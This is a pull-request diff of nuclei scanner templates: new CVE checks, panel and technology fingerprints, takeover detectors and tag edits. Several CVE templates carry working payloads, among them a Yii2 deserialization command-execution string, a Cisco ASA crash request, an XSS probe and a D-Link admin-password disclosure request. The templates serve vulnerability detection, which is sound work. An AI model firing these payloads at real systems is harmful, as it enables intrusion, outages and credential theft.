Merge pull request #36 from projectdiscovery/master

Updation

.nuclei-ignore

@@ -13,7 +13,7 @@
 
 .pre-commit-config.yaml
 
-# Fuzzing
+# Fuzzing is excluded to avoid running bruteforce on every server as default.
 fuzzing/adminer-panel-fuzz.yaml
 fuzzing/arbitrary-file-read.yaml
 fuzzing/directory-traversal.yaml
@@ -23,6 +23,9 @@ fuzzing/iis-shortname.yaml
 fuzzing/wp-plugin-scan.yaml
 
 # Miscellaneous
+
+miscellaneous/detect-dns-over-https.yaml
+miscellaneous/detect-options-method.yaml
 miscellaneous/dir-listing.yaml
 miscellaneous/htaccess-config.yaml
 miscellaneous/joomla-htaccess.yaml
@@ -38,21 +41,28 @@ miscellaneous/robots.txt.yaml
 miscellaneous/security.txt.yaml
 miscellaneous/trace-method.yaml
 miscellaneous/unencrypted-bigip-ltm-cookie.yaml
+miscellaneous/unpatched-coldfusion.yaml
 miscellaneous/xml-schema-detect.yaml
-miscellaneous/detect-dns-over-https.yaml
 
-# IOT
+# Headless
+
+headless/dvwa-headless-automatic-login.yaml
+headless/postmessage-tracker.yaml
+headless/prototype-pollution-check.yaml
+headless/window-name-domxss.yaml
+
+# iot
+
 iot/contacam.yaml
 iot/epmp-login.yaml
 iot/hp-laserjet-detect.yaml
 iot/internet-service.yaml
+iot/liveview-axis-camera.yaml
+iot/mobotix-guest-camera.yaml
 iot/network-camera-detect.yaml
 iot/nuuno-network-login.yaml
 iot/panasonic-network-management.yaml
 iot/selea-ip-camera.yaml
 
-# Headless
+# CVEs
-headless/dvwa-headless-automatic-login.yaml
+cves/2017/CVE-2017-17562.yaml
-headless/postmessage-tracker.yaml
-headless/prototype-pollution-check.yaml
-headless/window-name-domxss.yaml

README.md

@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
 
 | Templates        | Counts                         | Templates       | Counts                          | Templates      | Counts                       |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves             | 259           | vulnerabilities | 118 | exposed-panels | 113 |
+| cves             | 265           | vulnerabilities | 118 | exposed-panels | 117 |
-| takeovers        | 65        | exposures       | 65       | technologies   | 52   |
+| takeovers        | 67        | exposures       | 65       | technologies   | 57   |
-| misconfiguration | 54 | workflows       | 25         | miscellaneous  | 17  |
+| misconfiguration | 55 | workflows       | 25         | miscellaneous  | 19  |
 | default-logins   | 20 | exposed-tokens  | 9  | dns            | 8            |
-| fuzzing          | 7          | helpers         | 6         | iot            | 8            |
+| fuzzing          | 7          | helpers         | 6         | iot            | 10            |
 
-**80 directories, 852 files**.
+**80 directories, 874 files**.
 
 </td>
 </tr>

cves/2017/CVE-2017-17562.yaml

@@ -0,0 +1,100 @@
+id: CVE-2017-17562
+
+info:
+  name: Embedthis GoAhead RCE
+  description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
+  author: geeknik
+  reference:
+    - https://www.elttam.com/blog/goahead/
+    - https://github.com/ivanitlearning/CVE-2017-17562
+    - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
+  severity: high
+  tags: cve,cve2017,rce,embedthis,goahead,fuzz
+
+requests:
+  - payloads:
+      endpoint:
+        - admin
+        - apply
+        - non-CA-rev
+        - cgitest
+        - checkCookie
+        - check_user
+        - chn/liveView
+        - cht/liveView
+        - cnswebserver
+        - config
+        - configure/set_link_neg
+        - configure/swports_adjust
+        - eng/liveView
+        - firmware
+        - getCheckCode
+        - get_status
+        - getmac
+        - getparam
+        - guest/Login
+        - home
+        - htmlmgr
+        - index
+        - index/login
+        - jscript
+        - kvm
+        - liveView
+        - login
+        - login.asp
+        - login/login
+        - login/login-page
+        - login_mgr
+        - luci
+        - main
+        - main-cgi
+        - manage/login
+        - menu
+        - mlogin
+        - netbinary
+        - nobody/Captcha
+        - nobody/VerifyCode
+        - normal_userLogin
+        - otgw
+        - page
+        - rulectl
+        - service
+        - set_new_config
+        - sl_webviewer
+        - ssi
+        - status
+        - sysconf
+        - systemutil
+        - t/out
+        - top
+        - unauth
+        - upload
+        - variable
+        - wanstatu
+        - webcm
+        - webmain
+        - webproc
+        - webscr
+        - webviewLogin
+        - webviewLogin_m64
+        - webviewer
+        - welcome
+    raw:
+      - |
+        GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
+        Accept: */*
+        Connection: close
+
+    attack: sniper
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "environment variable"
+          - "display library search paths"
+        condition: and

cves/2018/CVE-2018-0101.yaml

@@ -0,0 +1,52 @@
+id: CVE-2018-0101
+
+info:
+  name: Cisco ASA Denial-of-Service # Leads to RCE
+  author: dwisiswant0
+  severity: critical
+  reference: https://www.exploit-db.com/exploits/43986
+  description: |
+    A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated,
+    remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that
+    the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition.
+  tags: cve,cve2018,cisco,dos,rce
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded
+        X-Aggregate-Auth: 1
+        X-Transcend-Version: 1
+        Accept-Encoding: identity
+        X-AnyConnect-Platform: linux-64
+        X-Support-HTTP-Auth: false
+        X-Pad: 0000000000000000000000000000000000000000
+
+        <?xml version="1.0" encoding="UTF-8"?>
+        <config-auth client="a" type="a" aggregate-auth-version="a">
+            <host-scan-reply>A</host-scan-reply>
+        </config-auth>
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200"
+
+      - type: dsl
+        dsl:
+          - "status_code_2 == 500"
+          - "status_code_2 == 501"
+          - "status_code_2 == 502"
+          - "status_code_2 == 503"
+          - "status_code_2 == 504"
+        condition: or

cves/2019/CVE-2019-11869.yaml

@@ -12,7 +12,7 @@ info:
     a payload into the plugin settings, such as the
     yuzo_related_post_css_and_style setting.
 
-    References:
+  reference: |
     - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
     - https://wpscan.com/vulnerability/9254
   tags: cve,cve2019,wordpress,wp-plugin,xss

cves/2019/CVE-2019-14205.yaml

@@ -4,6 +4,7 @@ info:
   author: pikpikcu
   severity: high
   tags: cve,cve2019,wordpress,wp-plugin,lfi
+  description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.
   reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205
 
 requests:

cves/2019/CVE-2019-17382.yaml

@@ -4,7 +4,8 @@ info:
   name: Zabbix Authentication Bypass
   author: Harsh Bothra
   severity: critical
-  reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17382
+  description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
+  reference: https://www.exploit-db.com/exploits/47467
   tags: cve,cve2019,zabbix
 
 requests:

cves/2020/CVE-2020-15148.yaml

@@ -0,0 +1,27 @@
+id: CVE-2020-15148
+
+info:
+  name: Yii 2 (yiisoft/yii2) RCE
+  author: pikpikcu
+  severity: high
+  reference: |
+      - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
+      - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
+  tags: cve,cve2020,rce,yii
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "total"
+          - "internal server error"
+        condition: and
+
+      - type: status
+        status:
+          - 500

cves/2020/CVE-2020-23517.yaml

@@ -0,0 +1,24 @@
+id: CVE-2020-23517
+
+info:
+  name: Aryanic HighMail (High CMS) XSS
+  author: geeknik
+  severity: medium
+  description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
+  reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
+  tags: xss,cve,cve2020
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - text/html
+        part: header
+      - type: word
+        words:
+          - "<img src=\"x\" onerror=\"alert('XSS')"

cves/2020/CVE-2020-25078.yaml

@@ -0,0 +1,32 @@
+id: CVE-2020-25078
+
+info:
+  name: D-Link DCS-2530L Administrator password disclosure
+  author: pikpikcu
+  severity: high
+  description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078
+  tags: cve,cve2020,dlink
+
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config/getuser?index=0"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "name="
+          - "pass="
+        condition: and
+
+      - type: word
+        words:
+          - "text/plain"
+        part: header
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-21975.yaml

@@ -0,0 +1,32 @@
+id: CVE-2021-21975
+
+info:
+  name: vRealize Operations Manager API SSRF (VMWare Operations)
+  author: luci
+  severity: critical
+  description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
+  tags: cve,cve2021,ssrf,vmware
+  reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+
+requests:
+  - raw:
+      - |
+        POST /casa/nodes/thumbprints HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json;charset=UTF-8
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+
+        ["127.0.0.1:443/ui/"]
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'vRealize Operations Manager'
+          - 'thumbprint'
+          - 'address'
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200

exposed-panels/joomla-panel.yaml

@@ -0,0 +1,17 @@
+id: joomla-panel
+
+info:
+  name: Joomla Panel
+  author: github.com/its0x08
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/administrator/"
+    matchers:
+      - type: word
+        words:
+          - '<meta name="generator" content="Joomla! - Open Source Content Management" />'
+          - '/administrator/templates/isis/images/joomla.png'
+        condition: or

exposed-panels/wago-plc-panel.yaml

@@ -0,0 +1,24 @@
+id: wago-plc-panel
+
+info:
+  name: WAGO PLC Panel
+  author: github.com/its0x08
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/plc/webvisu.htm"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<TITLE>CoDeSys WebVisualization</TITLE>"
+          - "webvisu.jar,minml.jar"
+        part: body
+        condition: or
+
+      - type: word
+        words:
+          - "WAGO_Webs"
+        part: header

exposed-panels/wordpress-login.yaml

@@ -0,0 +1,19 @@
+id: wordpress-panel
+
+info:
+  name: WordPress Panel
+  author: github.com/its0x08
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-login.php"
+    matchers:
+      - type: word
+        words:
+          - "WordPress</title>"
+          - "Log In</title>"
+          - '/wp-login.php?action=lostpassword">Lost your password?</a>'
+          - '<form name="loginform" id="loginform" action="{{BaseURL}}/wp-login.php" method="post">'
+        condition: or

exposed-panels/zte-panel.yaml

@@ -0,0 +1,23 @@
+id: zte-panel
+
+info:
+  name: ZTE Panel
+  author: github.com/its0x08
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers:
+      - type: word
+        words:
+          - "ZTE Corporation. All rights reserved. </div>"
+          - '<form name="fLogin" id="fLogin" method="post"  onsubmit="return false;" action="">'
+        part: body
+        condtion: and
+
+      - type: word
+        words:
+          - "Mini web server 1.0 ZTE corp 2005."
+        part: header

exposures/backups/sql-dump.yaml

@@ -18,6 +18,7 @@ requests:
       - "{{BaseURL}}/db.sql"
       - "{{BaseURL}}/dump.sql"
       - "{{BaseURL}}/{{Hostname}}.sql"
+      - "{{BaseURL}}/{{Hostname}}_db.sql"
       - "{{BaseURL}}/localhost.sql"
       - "{{BaseURL}}/mysqldump.sql"
       - "{{BaseURL}}/mysql.sql"
@@ -39,4 +40,4 @@ requests:
         status:
           - 200
           - 206
-        condition: or
+        condition: or

miscellaneous/detect-dns-over-https.yaml

@@ -7,7 +7,7 @@ info:
     - https://developers.google.com/speed/public-dns/docs/doh/
     - https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat
   severity: info
-  tags: dns,doh
+  tags: dns,doh,misc
 
 requests:
   - method: GET

miscellaneous/detect-options-method.yaml

@@ -0,0 +1,19 @@
+id: detect-options-method
+
+info:
+  name: Detect enabled OPTIONS methods
+  author: pdteam
+  severity: info
+  tags: misc
+
+requests:
+  - method: OPTIONS
+    path:
+      - "{{BaseURL}}"
+
+    extractors:
+      - type: regex
+        part: header
+        group: 1
+        regex:
+          - "Allow: ([A-Z,]+)"

miscellaneous/dir-listing.yaml

@@ -4,6 +4,7 @@ info:
   name: Directory listing enabled
   author: _harleo & pentest_swissky
   severity: info
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/htaccess-config.yaml

@@ -4,6 +4,7 @@ info:
   name: HTaccess config file
   author: Yash Anand @yashanand155
   severity: info
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/joomla-htaccess.yaml

@@ -5,6 +5,7 @@ info:
   author: oppsec
   severity: info
   description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc...
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/joomla-manifest-file.yaml

@@ -5,6 +5,7 @@ info:
   author: oppsec
   severity: info
   description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths.
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/missing-csp.yaml

@@ -4,6 +4,8 @@ info:
   author: geeknik
   severity: info
   description: Checks if there is a CSP header
+  tags: misc
+
 requests:
   - method: GET
     path:

miscellaneous/missing-hsts.yaml

@@ -3,8 +3,9 @@ info:
   name: Strict Transport Security Not Enforced
   author: Dawid Czarnecki
   severity: info
-  description: Checks if the HSTS is enabled by looking for Strict Transport Security
+  description: Checks if the HSTS is enabled by looking for Strict Transport Security response header.
-    response header.
+  tags: misc
+
 requests:
   - method: GET
     path:

miscellaneous/missing-x-frame-options.yaml

@@ -4,9 +4,7 @@ info:
   name: Clickjacking (Missing XFO header)
   author: kurohost
   severity: low
-
+  tags: misc
-  # This is an valid issue "only" when you able to frame authenticated page with poc to make state changing actions.
-  # Without working poc, do not report this.
 
 requests:
   - method: GET

miscellaneous/moodle-changelog.yaml

@@ -5,6 +5,7 @@ info:
   author: oppsec
   severity: info
   description: Moodle have a file which describes API changes in core libraries and APIs, can be used to discover Moodle version.
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/ntlm-directories.yaml

@@ -4,6 +4,7 @@ info:
   name: Discovering directories w/ NTLM
   author: puzzlepeaches
   severity: info
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/old-copyright.yaml

@@ -4,6 +4,7 @@ info:
   name: Find pages with old copyright dates
   author: geeknik
   severity: info
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/phpmyadmin-setup.yaml

@@ -4,7 +4,7 @@ info:
   name: Publicly Accessible Phpmyadmin Setup
   author: sheikhrishad
   severity: medium
-
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/robots.txt.yaml

@@ -3,6 +3,7 @@ info:
   name: robots.txt file
   author: CasperGN
   severity: info
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/security.txt.yaml

@@ -5,6 +5,7 @@ info:
   author: bad5ect0r
   severity: info
   description: The website defines a security policy.
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/trace-method.yaml

@@ -4,9 +4,8 @@ info:
   name: HTTP TRACE method enabled
   author: nodauf
   severity: info
-
+  tags: misc
-  # References:
+  reference: https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/
-  # - https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/
 
 requests:
   - method: TRACE

miscellaneous/unencrypted-bigip-ltm-cookie.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   reference: https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values
   mitigation: https://support.f5.com/csp/article/K23254150
+  tags: misc
 
 requests:
   - method: GET

miscellaneous/unpatched-coldfusion.yaml

@@ -0,0 +1,32 @@
+id: unpatched-coldfusion
+
+info:
+  name: Adobe ColdFusion - Improper Input Validation - Arbitrary Code Execution
+  author: Daviey
+  severity: info
+  reference: |
+      - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
+      - https://twitter.com/Daviey/status/1374070630283415558
+  tags: rce,adobe,misc
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js"
+      - "{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js"
+      - "{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js"
+      - "{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js"
+      - "{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js"
+      - "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
+      - "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - 'eval\(\"\(\"\+json\+\"\)\"\)'
+
+      - type: status
+        status:
+          - 200

miscellaneous/xml-schema-detect.yaml

@@ -3,6 +3,7 @@ info:
   name: XML Schema Detection
   author: alph4byt3
   severity: info
+  tags: misc
 
 requests:
   - method: GET

misconfiguration/phpMyAdmin-setup.yaml

@@ -0,0 +1,17 @@
+id: phpmyadmin-setup
+
+info:
+  name: phpMyAdmin setup page
+  author: thevillagehacker
+  severity: medium
+  tags: phpmyadmin
+  reference: https://hackerone.com/reports/297339
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/phpmyadmin/setup/index.php"
+    matchers:
+      - type: word
+        words:
+          - "<title>phpMyAdmin setup</title>"

takeovers/freshdesk-takeover.yaml

@@ -0,0 +1,20 @@
+id: freshdesk-takeover
+
+info:
+  name: freshdesk takeover detection
+  author: Gal Nagli @naglinagli
+  severity: high
+  tags: takeover
+  reference: https://twitter.com/ja1sharma/status/1377239265348743175
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        words:
+          - There is no helpdesk here!
+          - Maybe this is still fresh!
+        condition: and

takeovers/hatenablog-takeover.yaml

@@ -15,5 +15,4 @@ requests:
     matchers:
       - type: word
         words:
-          - 404 Blog is not found
+          - 404 Blog is not found
-          - Sorry, we can't find the page you're looking for.

takeovers/medium-takeover.yaml

@@ -0,0 +1,20 @@
+id: medium-takeover
+
+info:
+  name: Medium Takeover Detection
+  author: rtcms
+  severity: high
+  tags: takeover
+  reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/206
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        words:
+          - Oops! We couldn’t find that page
+          - Sorry about that
+        condition: and

technologies/bolt-cms-detect.yaml

@@ -0,0 +1,33 @@
+id: bolt-cms-detect
+
+info:
+  name: bolt CMS detect
+  author: cyllective
+  severity: info
+  description: Detects bolt CMS
+  tags: tech,bolt,cms
+  references:
+    - https://github.com/bolt/bolt
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bolt/login"
+
+    matchers:
+      - type: word
+        part: body
+        condition: or
+        words:
+          - '<form action="/bolt/login"'
+          - '<img class="logo" alt="Bolt CMS logo"'
+          - '<img src="/app/view/img/bolt-logo.png"'
+          - '<link rel="shortcut icon" href="/app/view/img/favicon-bolt.ico">'
+          - '<link rel="stylesheet" href="/app/view/css/bolt-old-ie.css"'
+          - '<link rel="stylesheet" href="/app/view/css/bolt.css"'
+          - '<script src="/app/view/js/bolt.js"></script>'
+          - '<script src="/app/view/js/bolt.min.js"'
+          - '<script src="/assets/bolt.js"></script>'
+          - 'Bolt requires JavaScript to function properly and continuing without it might corrupt or erase data.'
+          - 'Bolt » Login'
+          - 'Cookies are required to log on to Bolt. Please allow cookies.'

technologies/moinmoin-detect.yaml

@@ -0,0 +1,30 @@
+id: moinmoin-detect
+
+info:
+  name: MoinMoin wiki detect
+  author: cyllective
+  severity: info
+  description: Detects MoinMoin Wiki
+  tags: tech,moin,moinmoin,wiki
+  references:
+    - https://github.com/moinwiki/moin-1.9
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: body
+        condition: or
+        words:
+          - '<a href="http://moinmo.in/" title="This site uses the MoinMoin Wiki software.">MoinMoin Powered</a>'
+          - '<a href="http://moinmo.in/Python" title="MoinMoin is written in Python.">Python Powered</a>'
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '\/moin_static(\w+)\/'

technologies/opencast-detect.yaml

@@ -0,0 +1,21 @@
+id: opencast-detect
+
+info:
+  name: Opencast detect
+  author: cyllective
+  severity: info
+  description: Detects Opencast
+  tags: tech,opencast
+  references:
+    - https://github.com/opencast/opencast
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin-ng/login.html"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Opencast</title>'

technologies/shopware-detect.yaml

@@ -0,0 +1,27 @@
+id: shopware-detect
+
+info:
+  name: Shopware CMS detect
+  author: cyllective
+  severity: info
+  description: Detects Shopware CMS
+  tags: tech,shopware,cms
+  references:
+    - https://github.com/shopware/shopware
+    - https://github.com/shopware/platform
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin"
+      - "{{BaseURL}}/backend"
+
+    matchers:
+      - type: word
+        part: body
+        condition: or
+        words:
+          - 'Realisiert mit Shopware'
+          - 'Realised with Shopware'
+          - 'Shopware Administration (c) shopware AG'
+          - '<title>Shopware 5 - Backend (c) shopware AG</title>'

technologies/strapi-cms-detect.yaml

@@ -0,0 +1,22 @@
+id: strapi-cms-detect
+
+info:
+  name: strapi CMS detect
+  author: cyllective
+  severity: info
+  description: Detects strapi CMS
+  tags: tech,strapi,cms
+  references:
+    - https://github.com/strapi/strapi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/auth/login"
+
+    matchers:
+      - type: word
+        part: body
+        condition: or
+        words:
+          - '<title>Strapi Admin</title>'

workflows/cisco-asa-workflow.yaml

@@ -16,4 +16,5 @@ workflows:
     subtemplates:
       - template: cves/2020/CVE-2020-3187.yaml
       - template: cves/2020/CVE-2020-3452.yaml
-      - template: cves/2018/CVE-2018-0296.yaml
+      - template: cves/2018/CVE-2018-0296.yaml
+      - template: cves/2018/CVE-2018-0101.yaml